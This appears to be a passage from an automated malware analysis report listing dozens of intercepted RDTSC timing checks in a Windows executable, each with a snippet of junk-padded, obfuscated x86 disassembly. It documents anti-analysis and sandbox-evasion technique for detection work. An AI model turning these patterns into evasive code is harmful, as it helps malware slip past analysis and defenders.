Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA5F second address: C2BA76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA76 second address: C2BA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d ja 00007FC22CC1B8BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA9D second address: C2BAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E813 second address: C2E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E81D second address: C2E82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E82B second address: C2E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30873 second address: C30880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FC22D01ECC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30880 second address: C30884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30884 second address: C3088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3088A second address: C3088F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C303F5 second address: C303F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C303F9 second address: C3040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3040C second address: C3041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3041A second address: C30420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45735 second address: C4573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45884 second address: C4588B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4588B second address: C45891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45891 second address: C45896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45896 second address: C4589C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4589C second address: C458A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458A2 second address: C458D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f jmp 00007FC22D01ECCAh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458D2 second address: C458DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458DB second address: C458EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45A58 second address: C45A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45A65 second address: C45A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45D39 second address: C45D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007FC22CC1B8B6h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45EDB second address: C45EF9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45EF9 second address: C45EFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4604E second address: C46052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46052 second address: C46058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46058 second address: C46064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC22D01ECC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46064 second address: C46068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46068 second address: C4606C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4606C second address: C46092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FC22CC1B8ACh 0x00000016 jmp 00007FC22CC1B8AAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C491BF second address: C491C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492BA second address: C492C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492C4 second address: C492CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492CA second address: C492CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C103 second address: B5C107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5120437 second address: 51204CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c or ax, 6F98h 0x00000011 jmp 00007FC22CC1B8ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC22CC1B8B4h 0x00000022 adc esi, 780699F8h 0x00000028 jmp 00007FC22CC1B8ABh 0x0000002d popfd 0x0000002e mov ch, 63h 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 pushad 0x00000034 mov dx, 77D4h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FC22CC1B8B3h 0x0000003f sub ecx, 33370A6Eh 0x00000045 jmp 00007FC22CC1B8B9h 0x0000004a popfd 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e popad 0x0000004f mov edx, dword ptr [ebp+0Ch] 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51204CE second address: 51204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 512056F second address: 5120587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150774 second address: 5150820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e popfd 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebp 0x00000016 jmp 00007FC22D01ECD0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007FC22D01ECD0h 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC22D01ECCEh 0x0000002c jmp 00007FC22D01ECD5h 0x00000031 popfd 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007FC22D01ECCAh 0x0000003c push eax 0x0000003d jmp 00007FC22D01ECCBh 0x00000042 xchg eax, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC22D01ECD5h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150820 second address: 5150844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4B739FA2h 0x00000008 mov edi, 0F1013EEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150844 second address: 515088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov ax, 2C03h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d mov ebx, 29D597DCh 0x00000022 popad 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC22D01ECD7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150930 second address: 5150934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150934 second address: 5150951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150998 second address: 51509EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8ACh 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 popad 0x00000017 pop esi 0x00000018 jmp 00007FC22CC1B8B0h 0x0000001d leave 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51509EE second address: 51509F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51509F3 second address: 5150A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A09 second address: 5150A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A0D second address: 514002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007FC22CC1BA0Ah 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007FC2313D7A41h 0x00000026 mov edi, edi 0x00000028 jmp 00007FC22CC1B8B0h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC22CC1B8B7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514002C second address: 51400C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCFh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC22D01ECCBh 0x00000015 sub cx, 636Eh 0x0000001a jmp 00007FC22D01ECD9h 0x0000001f popfd 0x00000020 mov ax, 24F7h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC22D01ECD8h 0x0000002d add esi, 21A48A18h 0x00000033 jmp 00007FC22D01ECCBh 0x00000038 popfd 0x00000039 jmp 00007FC22D01ECD8h 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 mov edi, eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51400C2 second address: 51400C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51400C6 second address: 514010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a sub esp, 2Ch 0x0000000d jmp 00007FC22D01ECD0h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC22D01ECCEh 0x0000001a or ecx, 717EDE08h 0x00000020 jmp 00007FC22D01ECCBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov ecx, 3A80EC95h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514010D second address: 5140111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140111 second address: 5140134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, bx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140134 second address: 51401A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC22CC1B8B0h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FC22CC1B8ABh 0x0000000f sbb ah, 0000005Eh 0x00000012 jmp 00007FC22CC1B8B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c jmp 00007FC22CC1B8AEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC22CC1B8ACh 0x0000002b sub ax, 8788h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51401E2 second address: 51401E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51401E8 second address: 5140297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8AAh 0x00000013 add si, 3EA8h 0x00000018 jmp 00007FC22CC1B8ABh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f call 00007FC22CC1B8B9h 0x00000024 pushfd 0x00000025 jmp 00007FC22CC1B8B0h 0x0000002a or eax, 1A50EC38h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 mov edi, 00000000h 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 mov ecx, 53A136BDh 0x00000045 popad 0x00000046 inc ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c pushfd 0x0000004d jmp 00007FC22CC1B8ABh 0x00000052 xor cx, AEAEh 0x00000057 jmp 00007FC22CC1B8B9h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140297 second address: 514029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514029D second address: 51402B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop ebx 0x0000000f jmp 00007FC22CC1B8ACh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402B9 second address: 51402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402BF second address: 51402C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402C3 second address: 5140302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC22D01EE4Dh 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 jmp 00007FC22D01ECD5h 0x0000001e mov dword ptr [ebp-14h], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140302 second address: 5140306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140306 second address: 514030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514030A second address: 5140310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403C8 second address: 51403CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403CC second address: 51403E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403E3 second address: 5140487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 sub cx, 8FBEh 0x0000000e jmp 00007FC22D01ECD9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jg 00007FC29EB0CD38h 0x0000001f jmp 00007FC22D01ECCCh 0x00000024 js 00007FC22D01ECF7h 0x0000002a jmp 00007FC22D01ECD0h 0x0000002f cmp dword ptr [ebp-14h], edi 0x00000032 pushad 0x00000033 movzx ecx, di 0x00000036 push ebx 0x00000037 movzx ecx, bx 0x0000003a pop ebx 0x0000003b popad 0x0000003c jne 00007FC29EB0CD12h 0x00000042 jmp 00007FC22D01ECCEh 0x00000047 mov ebx, dword ptr [ebp+08h] 0x0000004a jmp 00007FC22D01ECD0h 0x0000004f lea eax, dword ptr [ebp-2Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FC22D01ECCAh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140487 second address: 5140496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140496 second address: 51404C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECCDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51404C3 second address: 51404FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22CC1B8ADh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51404FA second address: 5140558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6A3D4A12h 0x00000008 pushfd 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e sub si, 720Eh 0x00000013 jmp 00007FC22D01ECD9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FC22D01ECCAh 0x00000026 add cx, 8088h 0x0000002b jmp 00007FC22D01ECCBh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140558 second address: 5140617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8B6h 0x0000000c sub ecx, 4760E2E8h 0x00000012 jmp 00007FC22CC1B8ABh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC22CC1B8AFh 0x00000021 add si, DA2Eh 0x00000026 jmp 00007FC22CC1B8B9h 0x0000002b popfd 0x0000002c mov edx, eax 0x0000002e popad 0x0000002f nop 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC22CC1B8B8h 0x00000037 and cl, FFFFFFD8h 0x0000003a jmp 00007FC22CC1B8ABh 0x0000003f popfd 0x00000040 mov esi, 2989AD8Fh 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC22CC1B8B2h 